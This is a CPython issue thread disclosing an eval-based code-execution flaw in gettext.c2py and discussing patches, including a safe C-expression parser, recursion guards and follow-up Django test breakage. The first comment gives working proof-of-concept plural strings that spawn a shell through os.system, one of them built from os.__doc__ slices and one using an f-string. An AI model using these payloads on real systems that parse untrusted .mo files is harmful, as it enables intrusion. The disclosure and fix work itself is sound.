New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Arbitrary code execution in gettext.c2py #72749
Comments
The c2py-function in the gettext module is seriously flawed in many ways due return eval('lambda n: int(%s)' % plural) My first discovery was that nothing prevents an input plural string that gettext.c2py("n()")(lambda: os.system("sh")) This is of course a low risk bug, since it requires control of both the plural Gaining arbitrary code execution using only the plural function string requires gettext.c2py( '"(eval(foo) && ""' )(0) ----> 1 gettext.c2py( '"(eval(foo) && ""' )(0) It will pass since it recognizes the entire input as a STRING token, and Passing a string in the argument to eval will however break the exploit since Instead of passing a string to eval, we can build a string from characters in gettext.c2py('"(eval('
'os.__doc__[152:155] + ' # os.
'os.__doc__[46:52] + ' # system
'os.__doc__[318] + ' # (
'os.__doc__[55] + ' # '
'os.__doc__[10] + ' # s
'os.__doc__[42] + ' # h
'os.__doc__[55] + ' # '
'os.__doc__[329]' # )
') && ""')(0) This will successfully spawn a shell in Python 2.7.11. Bonus: With the new string interpolation in Python 3.7, exploiting gettext.c2py gettext.c2py('f"{os.system(\'sh\')}"')(0) The tokenizer will recognize the entire format-string as just a string, thus To mitigate these vulnerabilities, eval should be avoided by implementing a |
gettext_c2py.patch tries to avoid the problem. It still uses eval but manually parse the expression using tokens extracted from gettext. Tests are passed. But there is still a problem. Both patched and original c2py fail to handle nested ternary operator. They respect the right associative but fails to handle expressions like '1?2?3:4:5'. |
It doesn't solve the case when an identifier or number is used as a function: >>> import os
>>> gettext.c2py("n()")(lambda: os.system("sh"))
$
0
>>> gettext.c2py("1()")(0)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <lambda>
TypeError: 'int' object is not callable This is more of an unintended behavior than a security issue. Xiang Zhang: I've created a patch based on yours which handles the above case. I've also added a corresponding test case. Imo it would be even better if we could avoid eval. One possible (and safe) way would be to construct a safe subset of Python using the ast module. This would however still require that the C-style syntax is translated to Python. As you mention, there are issues parsing and translating nested ternary operators, and I doubt it will be possible to cover all cases with the regex replace utilized today. |
What if make repeated replacements with regular expression r'([^?:]?)\?([^?:]?):([^?:]*)'? |
In the first case we should convert an argument to integer. ns = {}
exec('''if True:
def func(arg):
n = int(arg)
return {}
'''.format(plural), ns)
return ns['func'] Or raise an exception if argument is not integer. In the second case I think we can just left it as is. This is not valid C expression. Or we can add try/except in above code and convert TypeError to ValueError if this is more preferable exception. |
Empty parentheses should be disallowed. Function calls are not allowed in plural expression. And non-integer argument should be disallowed either, just as Serhiy's example shows.
How does it work for '1?2:3?4:5'? :-( I am considering a parser. |
'1?2:3?4:5' -> '(2 if 1 else 3)?4:5' -> '(4 if (2 if 1 else 3) else 5' But there are other problems. Precedence of some operators is different in C and Python. Chained comparison in Python cause different result that in C (e.g. '2 == 2 == 2'). Seems there is no other way besides a simple parser. gettext_c2py.patch itself LGTM for fixing security issue, but tests are needed. It would be nice to make c2py() working with any expressions, but if this is too hard, this can be left for other issue. I'm going to commit a variant of gettext_c2py.patch before 3.6 release if there will be not better patches. |
Verified gettext.c2py with gettext_c2py.patch applied agains the plural forms actually used in localization, listed over at http://docs.translatehouse.org/projects/localization-guide/en/latest/l10n/pluralforms.html. I tested all of the none-trivial forms, and from what I can tell they generate valid syntax and are correct. |
This is not right. It's right associative so it should be 1?2:(3?4:5) -> 1?2:(4 if 3 else 5) -> 2 if 1 else (4 if 3 else 5)
Agree. But I am interested in trying.
It gets drawbacks so I don't include tests. I'll add in next try. |
The gettext module might be vulnerable to f-string attacks, too. Also see bpo-18317. |
It is. See the example in the first comment: gettext.c2py('f"{os.system(\'sh\')}"')(0) This vulnerability seems to be solved in Xiang's patch. The DoS aspect is interesting though, since there's no constraints against malicious use of the power-operator, say "9**9**9**..**9". This too would be solved by implementing a parser with only simple arithmetics. |
Argh, sorry. I meant to write "The gettext module might be vulnerable to more than f-string attacks.". May I suggest that you have a look at my old patch? It uses an AST visitor to inspect the AST of a gettext plural expression. It allows only a limited set of AST types as well as limited amount of expressions. I consider it a superior solution and a fix for more generic attacks. I haven't tested my patch with f-strings yet. It either refuses f-strings FormattedValue already or can be easily modified to reject it. |
Christian, I think our patches are quite similar in function. They only allow limited tokens.
Mine now still allows **. But it can be easily fixed. But both our patches still translate a C expression to Python and still suffer from nested ternary operator and different semantics between C and Python, e.g. (2==2==2 as Serhiy notes). :-( I plan to try a simple parser. |
gettext_c2py_v2.patch implements a simple C expression parser. More tests are included. Carl, hope you are willing to test it. |
Judging by the code, this seems to be a much more rigid implementation. I've only run the unit tests and some variations of my initial examples, and everything seems to work as intended. Will look at it more closely this afternoon. One thing that caught my attention in the patch is that gettext.c2py is removed entirely. I know that this function is not exposed in the docs or in __all__, but it still has "public scope" and it's likely used directly in the wild (googling the signature confirms this). Perhaps it should give a DeprectationWarning and delegate to _Plural? |
I hold a conservative opinion about this. c2py in my mind should be a inner help method. It's not documented so if there are users using it, they are risking changes. And as reported here, it's buggy and dangerous. |
Sorry Xiang, but your patch looks overcomplicated to me. Too much methods, decorators, classes, too much strange names. Here is simpler implementation with using only one recursive function. |
It's fine. That's a Pratt parser. Yes, the names are strange. Your patch looks more simpler. I left several comments. |
Just for reference: https://www.gnu.org/software/gettext/manual/gettext.html#Plural-forms Yet one security issue is that too deep recursion can cause MemoryError or even a crash in Python compiler. My patch creates too much nested parenthesis. Updated patch minimize using parenthesis to minimum and adds guards against too deep recursion. |
LGTM. And I expect there could be a comment about the special decimal number. |
What a comment you need Xiang? Isn't existing comment enough? |
Looks good to me. It behaves as intended on every input I can think of. |
Serhiy, I mean the case a number starting with 0, e.g. 0123. The plural form is a C expression and in C 0123 is an octal number. c2py now interprets it as a decimal number. |
New changeset e0cc3fadd7b3 by Serhiy Storchaka in branch '2.7': New changeset 7e66c5dc4218 by Serhiy Storchaka in branch '3.3': New changeset 730cf8cdf02c by Serhiy Storchaka in branch '3.4': New changeset e0dd4cc9661a by Serhiy Storchaka in branch '3.5': New changeset 7ea64ab9a5c8 by Serhiy Storchaka in branch '3.6': New changeset 4ca9a4f96edc by Serhiy Storchaka in branch 'default': |
Hi, this broke a couple tests with Django because it's passing number as a float rather than an integer. For example: ====================================================================== Traceback (most recent call last):
File "/home/tim/code/django/tests/template_tests/filter_tests/test_filesizeformat.py", line 28, in test_localized_formats
self.assertEqual(filesizeformat(1023), '1023\xa0Bytes')
File "/home/tim/code/django/django/template/defaultfilters.py", line 895, in filesizeformat
value = ungettext("%(size)d byte", "%(size)d bytes", bytes_) % {'size': bytes_}
File "/home/tim/code/django/django/utils/translation/__init__.py", line 91, in ungettext
return _trans.ungettext(singular, plural, number)
File "/home/tim/code/django/django/utils/translation/trans_real.py", line 385, in ngettext
return do_ntranslate(singular, plural, number, 'ngettext')
File "/home/tim/code/django/django/utils/translation/trans_real.py", line 372, in do_ntranslate
return getattr(t, translation_function)(singular, plural, number)
File "/home/tim/code/cpython/Lib/gettext.py", line 441, in ngettext
tmsg = self._catalog[(msgid1, self.plural(n))]
File "<string>", line 4, in func
ValueError: Plural value must be an integer, got 1023.0. Can you advise if this patch could be adapted or if Django should adapt? By the way, I used this patch to get a more useful error message: diff --git a/Lib/gettext.py b/Lib/gettext.py
index 7032efa..2076a3f 100644
--- a/Lib/gettext.py
+++ b/Lib/gettext.py
@@ -185,7 +185,7 @@ def c2py(plural):
exec('''if True:
def func(n):
if not isinstance(n, int):
- raise ValueError('Plural value must be an integer.')
+ raise ValueError('Plural value must be an integer, got %%s.
return int(%s)
''' % result, ns)
return ns['func'] |
GNU gettext only allows the plural value(n) to be an integer(unsigned long int). Django deliberately converts the value to long in filesizeformat. Any reason not to use int? |
Proposed patch makes gettext accepting non-integer numbers. But DeprecationWarning is emitted if this number have fractional part (because in this case the result of current code can be different from the result of old code). I think Django tests should be passed without errors and warnings. In future versions (probably in 3.7) this warning will be replaced with TypeError or ValueError, and new warning will be added for all non-integer numbers. |
Thanks, that does fix that first test. There is one more that still fails: $ python -Wall tests/runtests.py humanize_tests.tests.HumanizeTests.test_i18n_intword
Testing against Django installed in '/home/tim/code/django/django' with up to 3 processes
Creating test database for alias 'default'...
Creating test database for alias 'other'...
/home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.2
tmsg = self._catalog[(msgid1, self.plural(n))]
/home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.2
tmsg = self._catalog[(msgid1, self.plural(n))]
F ====================================================================== Traceback (most recent call last):
File "/home/tim/code/django/tests/humanize_tests/tests.py", line 133, in test_i18n_intword
self.humanize_tester(test_list, result_list, 'intword')
File "/home/tim/code/django/tests/humanize_tests/tests.py", line 39, in humanize_tester
msg="%s test failed, produced '%s', should've produced '%s'" % (method, rendered, result))
AssertionError: '1,2 Million' != '1,2 Millionen' : intword test failed, produced '1,2 Million', should've produced '1,2 Millionen' I think the relevant code is https://github.com/django/django/blob/cbae4d31847d75d889815bfe7c04af035f45e28d/django/contrib/humanize/templatetags/humanize.py#L60-L63. I'm not too familiar with this code, but I'll try to get a better explanation if it's not clear to you. |
What about following patch? |
Yes, that fixes the second test. Current warning (with stacklevel=3): /home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.29 Possibly the stacklevel should instead be 4: /home/tim/code/django/django/utils/translation/trans_real.py:373: DeprecationWarning: Plural value must be an integer, got 1.29 |
New changeset 5b6cde995b3a by Serhiy Storchaka in branch '3.3': New changeset 6ca91a14a555 by Serhiy Storchaka in branch '2.7': New changeset f78a05cda5aa by Serhiy Storchaka in branch '3.4': New changeset 6a2754055ff8 by Serhiy Storchaka in branch '3.5': New changeset 4c201c65ce5d by Serhiy Storchaka in branch '3.6': New changeset d0efb8532589 by Serhiy Storchaka in branch 'default': |
Yes, you are right, the stacklevel should be 4. Thank you for your report and testing Tim. Committed the patch without any deprecation. Will add a deprecation in separate issue. |
Misc/NEWS
so that it is managed by towncrier #552Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.
Show more details
GitHub fields:
bugs.python.org fields:
The text was updated successfully, but these errors were encountered: